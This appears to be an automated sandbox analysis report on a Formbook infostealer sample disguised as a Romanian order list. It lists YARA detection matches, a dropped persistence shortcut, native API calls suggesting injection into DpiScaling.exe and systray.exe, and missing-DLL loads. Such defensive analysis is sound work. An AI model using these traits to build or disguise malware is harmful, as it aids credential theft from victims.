Source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Contacts\vyyfnwgfdT.url, type: DROPPED Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\Contacts\vyyfnwgfdT.url, type: DROPPED Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Detected potential crypto function
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046CD466 13_2_046CD466
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0461841F 13_2_0461841F
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D1D55 13_2_046D1D55
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04600D20 13_2_04600D20
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D2D07 13_2_046D2D07
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0461D5E0 13_2_0461D5E0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D25DD 13_2_046D25DD
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04632581 13_2_04632581
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04626E30 13_2_04626E30
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046CD616 13_2_046CD616
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D2EF7 13_2_046D2EF7
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D1FF1 13_2_046D1FF1
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046DDFCE 13_2_046DDFCE
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046DE824 13_2_046DE824
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C1002 13_2_046C1002
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D28EC 13_2_046D28EC
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046320A0 13_2_046320A0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D20A8 13_2_046D20A8
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0461B090 13_2_0461B090
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04624120 13_2_04624120
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0460F900 13_2_0460F900
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D22AE 13_2_046D22AE
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046D2B28 13_2_046D2B28
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046C03DA 13_2_046C03DA
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046CDBD2 13_2_046CDBD2
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0463EBB0 13_2_0463EBB0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0457D466 20_2_0457D466
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044C841F 20_2_044C841F
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04571002 20_2_04571002
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_045828EC 20_2_045828EC
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044CB090 20_2_044CB090
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E20A0 20_2_044E20A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_045820A8 20_2_045820A8
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04581D55 20_2_04581D55
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044BF900 20_2_044BF900
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04582D07 20_2_04582D07
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044B0D20 20_2_044B0D20
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044D4120 20_2_044D4120
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_045825DD 20_2_045825DD
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044CD5E0 20_2_044CD5E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044E2581 20_2_044E2581
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044D6E30 20_2_044D6E30
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04582EF7 20_2_04582EF7
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_045822AE 20_2_045822AE
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04582B28 20_2_04582B28
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_0457DBD2 20_2_0457DBD2
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_04581FF1 20_2_04581FF1
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044EEBB0 20_2_044EEBB0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D5C2A5 20_2_02D5C2A5
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D5BA6A 20_2_02D5BA6A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D5CBC0 20_2_02D5CBC0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D5CB43 20_2_02D5CB43
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D42FB0 20_2_02D42FB0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D5CF64 20_2_02D5CF64
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D5CF61 20_2_02D5CF61
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D48C80 20_2_02D48C80
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D48C7B 20_2_02D48C7B
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D42D90 20_2_02D42D90
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D42D87 20_2_02D42D87
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 044BB150 appears 35 times
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: String function: 0460B150 appears 35 times
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649540 NtReadFile,LdrInitializeThunk, 13_2_04649540
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046495D0 NtClose,LdrInitializeThunk, 13_2_046495D0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649660 NtAllocateVirtualMemory,LdrInitializeThunk, 13_2_04649660
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046496E0 NtFreeVirtualMemory,LdrInitializeThunk, 13_2_046496E0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649710 NtQueryInformationToken,LdrInitializeThunk, 13_2_04649710
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649FE0 NtCreateMutant,LdrInitializeThunk, 13_2_04649FE0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046497A0 NtUnmapViewOfSection,LdrInitializeThunk, 13_2_046497A0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649780 NtMapViewOfSection,LdrInitializeThunk, 13_2_04649780
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649860 NtQuerySystemInformation,LdrInitializeThunk, 13_2_04649860
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649840 NtDelayExecution,LdrInitializeThunk, 13_2_04649840
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046498F0 NtReadVirtualMemory,LdrInitializeThunk, 13_2_046498F0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649910 NtAdjustPrivilegesToken,LdrInitializeThunk, 13_2_04649910
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046499A0 NtCreateSection,LdrInitializeThunk, 13_2_046499A0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649A50 NtCreateFile,LdrInitializeThunk, 13_2_04649A50
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649A20 NtResumeThread,LdrInitializeThunk, 13_2_04649A20
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649A00 NtProtectVirtualMemory,LdrInitializeThunk, 13_2_04649A00
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649560 NtWriteFile, 13_2_04649560
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649520 NtWaitForSingleObject, 13_2_04649520
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0464AD30 NtSetContextThread, 13_2_0464AD30
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046495F0 NtQueryInformationFile, 13_2_046495F0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649670 NtQueryInformationProcess, 13_2_04649670
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649650 NtQueryValueKey, 13_2_04649650
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649610 NtEnumerateValueKey, 13_2_04649610
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046496D0 NtCreateKey, 13_2_046496D0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649760 NtOpenProcess, 13_2_04649760
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0464A770 NtOpenThread, 13_2_0464A770
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649770 NtSetInformationFile, 13_2_04649770
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649730 NtQueryVirtualMemory, 13_2_04649730
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0464A710 NtOpenProcessToken, 13_2_0464A710
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0464B040 NtSuspendThread, 13_2_0464B040
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649820 NtEnumerateKey, 13_2_04649820
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046498A0 NtWriteVirtualMemory, 13_2_046498A0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649950 NtQueueApcThread, 13_2_04649950
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_046499D0 NtCreateProcessEx, 13_2_046499D0
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649A10 NtQuerySection, 13_2_04649A10
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649A80 NtOpenDirectoryObject, 13_2_04649A80
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_04649B00 NtSetValueKey, 13_2_04649B00
Source: C:\Windows\SysWOW64\DpiScaling.exe Code function: 13_2_0464A3B0 NtGetContextThread, 13_2_0464A3B0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9840 NtDelayExecution,LdrInitializeThunk, 20_2_044F9840
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9860 NtQuerySystemInformation,LdrInitializeThunk, 20_2_044F9860
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9540 NtReadFile,LdrInitializeThunk, 20_2_044F9540
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 20_2_044F9910
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F95D0 NtClose,LdrInitializeThunk, 20_2_044F95D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F99A0 NtCreateSection,LdrInitializeThunk, 20_2_044F99A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9A50 NtCreateFile,LdrInitializeThunk, 20_2_044F9A50
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9650 NtQueryValueKey,LdrInitializeThunk, 20_2_044F9650
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9660 NtAllocateVirtualMemory,LdrInitializeThunk, 20_2_044F9660
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9610 NtEnumerateValueKey,LdrInitializeThunk, 20_2_044F9610
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F96D0 NtCreateKey,LdrInitializeThunk, 20_2_044F96D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F96E0 NtFreeVirtualMemory,LdrInitializeThunk, 20_2_044F96E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9B00 NtSetValueKey,LdrInitializeThunk, 20_2_044F9B00
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9710 NtQueryInformationToken,LdrInitializeThunk, 20_2_044F9710
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9FE0 NtCreateMutant,LdrInitializeThunk, 20_2_044F9FE0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9780 NtMapViewOfSection,LdrInitializeThunk, 20_2_044F9780
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044FB040 NtSuspendThread, 20_2_044FB040
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9820 NtEnumerateKey, 20_2_044F9820
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F98F0 NtReadVirtualMemory, 20_2_044F98F0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F98A0 NtWriteVirtualMemory, 20_2_044F98A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9950 NtQueueApcThread, 20_2_044F9950
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9560 NtWriteFile, 20_2_044F9560
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9520 NtWaitForSingleObject, 20_2_044F9520
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044FAD30 NtSetContextThread, 20_2_044FAD30
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F99D0 NtCreateProcessEx, 20_2_044F99D0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F95F0 NtQueryInformationFile, 20_2_044F95F0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9670 NtQueryInformationProcess, 20_2_044F9670
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9A00 NtProtectVirtualMemory, 20_2_044F9A00
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9A10 NtQuerySection, 20_2_044F9A10
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9A20 NtResumeThread, 20_2_044F9A20
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9A80 NtOpenDirectoryObject, 20_2_044F9A80
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9760 NtOpenProcess, 20_2_044F9760
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9770 NtSetInformationFile, 20_2_044F9770
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044FA770 NtOpenThread, 20_2_044FA770
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044FA710 NtOpenProcessToken, 20_2_044FA710
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F9730 NtQueryVirtualMemory, 20_2_044F9730
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044F97A0 NtUnmapViewOfSection, 20_2_044F97A0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_044FA3B0 NtGetContextThread, 20_2_044FA3B0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D58690 NtReadFile, 20_2_02D58690
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D587C0 NtAllocateVirtualMemory, 20_2_02D587C0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D58710 NtClose, 20_2_02D58710
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D585E0 NtCreateFile, 20_2_02D585E0
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D5868A NtReadFile, 20_2_02D5868A
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D58632 NtCreateFile, 20_2_02D58632
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D587BC NtAllocateVirtualMemory, 20_2_02D587BC
Source: C:\Windows\SysWOW64\systray.exe Code function: 20_2_02D5870A NtClose, 20_2_02D5870A
Sample file is different than original file name gathered from version info
Source: Noua lista de comenzi.exe, 00000002.00000000.283032998.0000000000474000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameWebPicker4 vs Noua lista de comenzi.exe
Source: Noua lista de comenzi.exe, 00000002.00000003.285032152.00000000035B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebPicker4 vs Noua lista de comenzi.exe
PE file contains strange resources
Source: Noua lista de comenzi.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Noua lista de comenzi.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Tdfgwnfyyv.exe.2.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Tdfgwnfyyv.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6ld01n28q8c.exe.14.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6ld01n28q8c.exe.14.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6ld01n28q8c.exe.14.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ?l .dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???t.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2?f???.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2???~?.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2???~?.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2???~?.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2???~?.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2???~?.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ?l .dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??l.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??i.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??i.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??i.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??i.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ????.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ?l.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???2.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ???b.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\Noua lista de comenzi.exe Section loaded: ??.dll Jump to behavior
